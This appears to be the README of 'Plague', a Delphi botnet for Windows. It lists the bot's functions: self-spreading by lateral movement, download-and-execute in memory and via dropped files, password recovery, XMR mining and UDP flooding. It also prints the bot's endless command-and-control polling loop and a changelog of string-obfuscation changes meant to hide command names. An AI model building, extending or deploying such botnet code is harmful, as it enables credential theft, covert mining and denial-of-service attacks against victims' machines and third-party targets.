Just and older botnet, migrated from a private BitBucket repo. Written in Delphi, targeting Windows computers. Plague is/was capable of spreading automatically using multiple lateral movement vectors.
- Restart
- Update
- Uninstall
- Download File
- Upload File
- Download and Execute [Drop method]
- Download and Execute [In-memory method]
- Download and Execute [DLL in-memory method]
- Password Recovery
- XMR Mining
- UDP Flood
The basic execution loop is defined in the main unit (Plague.lpr). Once this loop is reached, the execution of the bot instance stays essentially the same.
Repeat
Net.GetCommands; //Download the current command list
For J:=1 to Net.CommandCount do Begin //Iterate through the available commands
if Net.Commands[J].Type='Abort' then Begin //If an Abort command is found
if CommandUnderExecution(Net.Commands[J]) then //and the given command is under execution
AbortCommand(Net.Commands[J]); //then abort it
end else Begin //If the command is not an Abort
if Not(CommandUnderExecution(Net.Commands[J])) then Begin //and it's awaiting execution
I:=FindAPlace; //then find an empty place in the Worker Array
NewWorker(I, Net.Commands[J]); //and create a new Worker to execute the command.
end;
end;
End;
Sleep(Delay); //Wait before contacting the server again
Until False; //Endless loop
1/29/2019 --> 
- Tools --> OpenURL -->
ShellExecutechanged toShellExecuteW - CmdWorker --> Execute --> Mine --> String
config.jsonmoved to Protected String Storage - CmdWorker --> Execute --> MemExec --> String
MemExecadded to String Table asbb32d835 - CmdWorker --> Execute --> DropExec --> String
DropExecadded to String Table as896bb1db - CmdWorker --> Execute --> Download --> String
Download successful.moved to Protected String Storage